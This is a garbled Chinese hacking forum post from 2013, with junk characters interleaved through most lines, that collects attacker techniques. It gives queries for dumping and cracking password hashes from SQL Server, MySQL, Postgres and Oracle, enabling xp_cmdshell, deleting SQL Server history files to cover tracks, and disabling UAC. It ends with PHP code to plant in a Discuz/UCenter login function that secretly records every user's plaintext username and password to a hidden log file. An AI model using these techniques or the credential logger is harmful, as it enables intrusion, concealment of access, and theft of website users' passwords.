1 X6 A, E, H/ k/ x% q+ i( i9 a各种类型数据库抓HASH破解最高权限密码!' C& p. i1 ]# _- r0 B* X) D% f
1.sql server2000' D) E3 T2 e+ z. l" q! p3 J
SELECT password from master.dbo.sysxlogins where name='sa'3 V7 e/ h }% x
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
0 {* w& I0 A) j5 g z; f2FD54D6119FFF04129A1D72E7C3194F7284A7F3A! I# J7 X$ E$ S- V
2 s, b. ~/ M/ v& z
0×0100- constant header6 U$ t) F% ]% H9 ^/ g
34767D5C- salt
1 o4 B7 J$ k7 o0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
& h! H, }( _8 E4 d# k# K" b i+ A; M2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash/ n9 T6 C* `8 Z+ J6 N& k$ Y+ T4 M
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash& P0 P' q6 h3 Z& k' V0 t* c
SQL server 2005:-
/ ]( H3 m. e3 a1 w1 v0 C! O1 [SELECT password_hash FROM sys.sql_logins where name='sa'
* Y! _; ]) ]: h' j6 k0 O* F" P& |* j0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F# P% Y7 g# C0 x9 x2 I' H
0×0100- constant header5 p+ v3 a$ z% M2 b* M
993BF231-salt
% A6 m& ]* J [5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash! b A0 u) d. V
crack case sensitive hash in cain, try brute force and dictionary based attacks.
* j E2 _: n& H; w1 O) f/ e
7 b5 F- G3 ^$ c- Bupdate:- following bernardo’s comments:- a6 b; o- ~' F: i
use function fn_varbintohexstr() to cast password in a hex string.1 C9 R+ z; d+ Z8 `( R* o2 z2 U W
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
+ C4 w" W6 O! S& i4 S; O% g
5 R3 A; r4 X% x- |6 ]MYSQL:-9 }( H+ U& j- E6 k5 M: B
7 c# | ?" t, `) B* l" nIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
( Z8 y8 _3 K7 p4 `/ ?/ Y4 ]7 v6 S9 o7 U
*mysql < 4.1, Z: Q+ r! |2 C
$ L7 [" i' O( ]+ dmysql> SELECT PASSWORD(‘mypass’);0 N9 @4 ^0 k8 o# O) m
+——————–+( v" ]0 E9 R( w! D8 D
| PASSWORD(‘mypass’) |
( x9 n% X9 E m2 ~% z+——————–+0 f- J# \( l2 z& }% u
| 6f8c114b58f2ce9e |
; A# q/ C! M3 e% d y+——————–+
1 E( f! b n* R; w4 R# q/ Q+ C; P; @- D& }( Y- E k! x. g' `+ `
*mysql >=4.1
! j& S" _# W$ d( \+ [+ c' @2 F$ k+ X* e* M" I# f. \* ]
mysql> SELECT PASSWORD(‘mypass’);/ P* e$ f1 h9 c4 M0 k( T4 E
+——————————————-+
) `: S! [ q: `1 w. Q| PASSWORD(‘mypass’) |* ]# q: f# S; j( g
+——————————————-+6 Q' m. }9 l" g* i. P j
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |4 p" h ~7 a3 Y$ O8 k
+——————————————-+* r* P$ r" R/ C! X/ P
6 g) `# j& T" u. E4 j6 h- M2 K) Q# F
Select user, password from mysql.user' |( D: {$ c6 O/ F. [
The hashes can be cracked in ‘cain and abel’
2 R3 c' ~0 L3 A
, W% U5 N8 \$ M2 x# X7 ^Postgres:-
, Z, Z" j6 b. _5 z6 ?- E+ _! o7 V8 FPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)+ D% _5 n1 ]' t0 B, z" {
select usename, passwd from pg_shadow;
; C6 V/ E; D- [+ C$ [usename | passwd: T1 t2 O) W" z
——————+————————————-
) C+ B+ l0 V: e4 Q wtestuser | md5fabb6d7172aadfda4753bf0507ed4396
2 Q5 s( H j; A. E! j6 ~& Zuse mdcrack to crack these hashes:-0 c# i; Y8 V+ W
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43962 x( g% b7 R$ S! y) q0 }
) s. P; V' N1 Z$ k
Oracle:-9 z( S' d$ K. o% I
select name, password, spare4 from sys.user$
0 r: e: v+ F) m% Y# t9 Q4 V& Chashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g) Z" q2 @: v9 W2 [' ?: [ s% v3 Q9 v
More on Oracle later, i am a bit bored….
2 N c4 v4 M' E
! O& w1 j. j0 c/ _0 v$ |! L! m) c6 u0 Y
在sql server2005/2008中开启xp_cmdshell
! F- T: F7 t. Z, b: t-- To allow advanced options to be changed.1 y2 ~( g8 d# C+ [/ V" D! S4 b
EXEC sp_configure 'show advanced options', 1
( M4 {7 [; j. r! @, q2 XGO
9 j/ R* P9 B3 i9 V2 Q-- To update the currently configured value for advanced options.
/ q: O* x+ R5 x* DRECONFIGURE
- c2 n; L5 ^4 P! o# i( _0 IGO( c/ ~5 {' b# R1 k4 r
-- To enable the feature.
5 O' `) O( V' h. Y7 u: k2 DEXEC sp_configure 'xp_cmdshell', 1
! ~# Y7 g: R6 l6 n" x) X; {4 K: p9 ^2 dGO
8 k) h" F5 e% }8 p: O; }! f* L* l-- To update the currently configured value for this feature.
, m8 p" J# m, ~" l7 a5 TRECONFIGURE: g) w. t* q8 o. p
GO& X6 v( [6 s$ J
SQL 2008 server日志清除,在清楚前一定要备份。4 Q% p3 x9 | U( O" o4 g- H6 \- r
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
! L* m; `% C0 [6 S. |2 jX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
3 G8 d3 c i# m- O% `5 }. ~; d+ P. @3 t0 S: V3 @) Y
对于SQL Server 2008以前的版本:
4 ?8 }0 p* I' s2 ESQL Server 2005:' [3 k6 Z5 ?4 d! J; A; D" H
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
% w' e5 B" | c: \SQL Server 2000:$ _# h8 q! |# V0 D, r7 F
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。+ J7 d9 D) G; w! Q
( C" B3 i+ O& D) N
本帖最后由 simeon 于 2013-1-3 09:51 编辑
; s- c) h% `9 o- T$ T% g# y7 B' O$ K& p0 `* Z8 x* s
4 N+ F( E" v# x: y8 ~9 ?! ^
windows 2008 文件权限修改
; V% C$ W; b6 ^. @1 x1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx0 v5 K' [6 w/ @7 g9 x {
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
/ u& O1 l+ n; ~8 E r# ^( |* A一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,( t S. f: e0 x0 Y
; H9 J/ J* v. U8 hWindows Registry Editor Version 5.008 M, N% c2 F! d" a# ]
[HKEY_CLASSES_ROOT\*\shell\runas]$ J- D# a' A) r7 ]. F3 `; U
@="管理员取得所有权"
$ W* x8 D" {6 F, b" `"NoWorkingDirectory"=""5 q* F& @, ~, D
[HKEY_CLASSES_ROOT\*\shell\runas\command]8 ^; k' S% ?% C6 `
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 }+ `& ?% Z+ P+ M
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
) z& g+ r: G' s5 a[HKEY_CLASSES_ROOT\exefile\shell\runas2]
1 _9 u0 X! T6 a; x' C@="管理员取得所有权"
# Y1 J; I+ D( x/ D& l% f( I"NoWorkingDirectory"=""
' }/ t* _6 u9 s' x[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
, Y- ]2 u# n5 Z/ a@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' C8 r0 U& `+ ^# {' z8 J# }: m
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
/ i" k* d+ `. u$ W/ u. A2 t* Z6 N1 X% k& X# A6 W( Q& h- L
[HKEY_CLASSES_ROOT\Directory\shell\runas]
8 \1 z8 p8 g4 o+ y@="管理员取得所有权"
3 C$ o5 r( N5 ], X* n" z' o# Z; ~"NoWorkingDirectory"=""
9 t' z% j: s) c* h' u P( h D[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
m' |4 @5 X; m8 }@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
2 Y5 w8 {% p1 b/ l! w# k"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
: R. H. ?# Z$ z9 p. Y: b+ P4 u; s# J7 v2 s$ L) ~+ v
0 G; a* r! z# f7 Qwin7右键“管理员取得所有权”.reg导入
6 t4 b$ i9 E( z5 J8 X$ O2 W8 \二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
% g9 K4 o/ ^: L: W' ?/ V1、C:\Windows这个路径的“notepad.exe”不需要替换
, U9 j2 _6 c" T* N: w2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
4 J' I: h0 a4 ~/ G. n; @! @3、四个“notepad.exe.mui”不要管. |$ ~2 Q- F6 E+ w
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和6 o- V5 P r& B, |7 e8 b: t
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”/ Q+ N) I" ]& c, H% Q, P9 f
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,/ _# f4 ]9 H/ H7 s A. f/ u2 O
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
9 r$ Q9 M U' h; `2 c. E- Rwindows 2008中关闭安全策略:
( d3 L/ O* m* t1 J5 t x; Dreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f- q1 |6 B: E4 j5 f& d% o
修改uc_client目录下的client.php 在
: G; J; |/ [; k s7 K0 R8 ^5 ffunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
& i# o# ?2 z/ E7 C) R, R下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
8 M( M6 h- Q0 L0 J9 X3 q2 _* c你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw; w6 u1 H, V$ U+ @, c( w6 z2 k
if(getenv('HTTP_CLIENT_IP')) {9 Z2 I$ P3 Z/ j6 h, [1 `
$onlineip = getenv('HTTP_CLIENT_IP'); a4 F0 ?1 q9 Q0 \% j+ M0 n+ f
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
& t6 B+ O S7 ]: @$onlineip = getenv('HTTP_X_FORWARDED_FOR');3 D" Q6 a1 z% n0 } z' ?
} elseif(getenv('REMOTE_ADDR')) {
( O1 n( d) r5 E+ I$onlineip = getenv('REMOTE_ADDR');/ \, w$ [3 ]0 Q; s7 A6 s, x
} else {2 N' W- ?* \6 C3 P* O
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
# v# l( f5 y+ ?( e5 G' |}4 N" i+ B' ~$ R: E8 C" A% X
$showtime=date("Y-m-d H:i:s");" O8 K5 I& @" F f. }
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
, j# X( |" w& e) h* C/ A* [1 z $handle=fopen('./data/cache/csslog.php','a+');
2 h7 Z6 K0 L- E$ e $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
分享
支持
反对